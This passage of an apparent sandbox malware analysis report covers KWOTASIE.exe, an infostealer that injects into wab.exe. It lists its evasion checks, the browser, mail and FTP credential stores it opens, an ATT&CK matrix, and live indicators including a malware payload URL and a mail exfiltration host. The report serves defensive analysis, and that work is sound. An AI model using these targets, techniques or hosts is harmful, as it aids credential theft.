            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\KWOTASIE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Users\user\Desktop\KWOTASIE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040595A
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_0040658F FindFirstFileW,FindClose,0_2_0040658F
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98234Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98125Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98016Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97900Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95234Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95125Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95014Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 94534Jump to behavior
            Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
            Source: wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: wab.exe, 00000006.00000002.3277621644.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3277621644.00000000007B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wab.exe, 00000006.00000002.3277621644.0000000000777000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
            Source: C:\Users\user\Desktop\KWOTASIE.exeAPI call chain: ExitProcess graph end nodegraph_0-3850
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_003370A0 CheckRemoteDebuggerPresent,6_2_003370A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 6_2_0033FB24 LdrInitializeThunk,6_2_0033FB24
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3FB0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 33FEACJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\KWOTASIE.exeCode function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040333D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3292987188.0000000021B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5032, type: MEMORYSTR
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: Yara matchFile source: 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5032, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3292987188.0000000021B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5032, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            PowerShell
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Software Packing
            1
            Credentials in Registry
            136
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)111
            Process Injection
            1
            DLL Side-Loading
            Security Account Manager631
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script261
            Virtualization/Sandbox Evasion
            LSA Secrets261
            Virtualization/Sandbox Evasion
            SSHKeylogging22
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            KWOTASIE.exe3%ReversingLabs
            KWOTASIE.exe9%VirustotalBrowse
            KWOTASIE.exe100%AviraHEUR/AGEN.1331786
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            bg.microsoft.map.fastly.net0%VirustotalBrowse
            zakk.co.za0%VirustotalBrowse
            ip-api.com0%VirustotalBrowse
            mail.lumies.co.za0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
            http://ip-api.com0%URL Reputationsafe
            http://mail.lumies.co.za0%VirustotalBrowse
            http://r11.i.lencr.org/00%Avira URL Cloudsafe
            http://zakk.co.za/GHAchl0.bin100%Avira URL Cloudmalware
            http://r11.o.len0%Avira URL Cloudsafe
            http://r11.o.lencr.org0#0%Avira URL Cloudsafe
            http://mail.lumies.co.za0%Avira URL Cloudsafe
            http://zakk.co.za/GHAchl0.bin1%VirustotalBrowse
            http://r11.i.lencr.org/00%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            199.232.210.172
            truefalseunknown
            zakk.co.za
            102.218.215.35
            truefalseunknown
            ip-api.com
            208.95.112.1
            truetrueunknown
            mail.lumies.co.za
            102.130.125.173
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://zakk.co.za/GHAchl0.binfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://ip-api.com/line/?fields=hostingfalse
            • URL Reputation: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nsis.sf.net/NSIS_ErrorErrorKWOTASIE.exefalse
            • URL Reputation: safe
            unknown
            http://r11.o.lenwab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://mail.lumies.co.zawab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://r11.o.lencr.org0#wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewab.exe, 00000006.00000002.3292987188.0000000021AF1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://x1.c.lencr.org/0wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://x1.i.lencr.org/0wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://r11.i.lencr.org/0wab.exe, 00000006.00000002.3292987188.0000000021B21000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294355001.0000000023EB4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000006.00000002.3294444992.0000000023F13000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://ip-api.comwab.exe, 00000006.00000002.3292987188.0000000021AF1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            208.95.112.1
            ip-api.comUnited States
            53334TUT-ASUStrue
            102.218.215.35
            zakk.co.zaunknown
            36926CKL1-ASNKEfalse
            102.130.125.173
            mail.lumies.co.zaSouth Africa
            37153xneeloZAtrue
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1465894
            Start date and time:2024-07-02 08:12:45 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 49s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:8
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:KWOTASIE.exe
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@6/11@3/3
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 62
            • Number of non-executed functions: 26
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 13.85.23.86, 93.184.221.240, 20.242.39.171, 52.165.164.15
            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            TimeTypeDescription
            02:13:37API Interceptor41x Sleep call for process: powershell.exe modified
            02:14:33API Interceptor68x Sleep call for process: wab.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            208.95.112.1ServerManager.exeGet hashmaliciousXWormBrowse
            • ip-api.com/line/?fields=hosting
            MicrosoftService.exeGet hashmaliciousXWormBrowse
            • ip-api.com/line/?fields=hosting
            F.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
            • ip-api.com/line/?fields=hosting
            x.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
            • ip-api.com/line/?fields=hosting
            java_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
            • ip-api.com/line/?fields=hosting
            Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
            • ip-api.com/json/
            x433.exeGet hashmaliciousXWormBrowse
            • ip-api.com/line/?fields=hosting
            DriverUpdt.exeGet hashmaliciousXWormBrowse
            • ip-api.com/line/?fields=hosting
            rinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • ip-api.com/line/?fields=hosting
            rQuotation.exeGet hashmaliciousAgentTeslaBrowse
            • ip-api.com/line/?fields=hosting
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            ip-api.comServerManager.exeGet hashmaliciousXWormBrowse
            • 208.95.112.1
            MicrosoftService.exeGet hashmaliciousXWormBrowse
            • 208.95.112.1
            F.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
            • 208.95.112.1
            x.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
            • 208.95.112.1
            java_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
            • 208.95.112.1
            Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
            • 208.95.112.1
            x433.exeGet hashmaliciousXWormBrowse
            • 208.95.112.1
            DriverUpdt.exeGet hashmaliciousXWormBrowse
            • 208.95.112.1
            rinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            • 208.95.112.1
            rQuotation.exeGet hashmaliciousAgentTeslaBrowse
            • 208.95.112.1
            bg.microsoft.map.fastly.netPayment Confirmation.vbsGet hashmaliciousRemcos, GuLoaderBrowse
            • 199.232.210.172
            pDHKarOK2v.exeGet hashmaliciousCryptOne, VidarBrowse
            • 199.232.214.172
            Revised Invoice 7389293.vbsGet hashmaliciousGuLoader, RemcosBrowse
            • 199.232.210.172
            http://differentia.ruGet hashmaliciousUnknownBrowse
            • 199.232.210.172
            https://docs.google.com/forms/d/e/1FAIpQLSdxwlJ42E7IP7P7FI5J10LvcZM2xU4rjZus8shJYViiMODIbA/viewform?pli=1Get hashmaliciousUnknownBrowse
            • 199.232.210.172
            http://polyfill.io/Get hashmaliciousUnknownBrowse
            • 199.232.210.172
            https://aradcofeenet1.aradcofeenet1.workers.dev/Get hashmaliciousUnknownBrowse
            • 199.232.214.172
            https://a289.dvq.workers.dev/Get hashmaliciousUnknownBrowse
            • 199.232.214.172
            http://pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
            • 199.232.210.172
            http://pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
            • 199.232.214.172
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
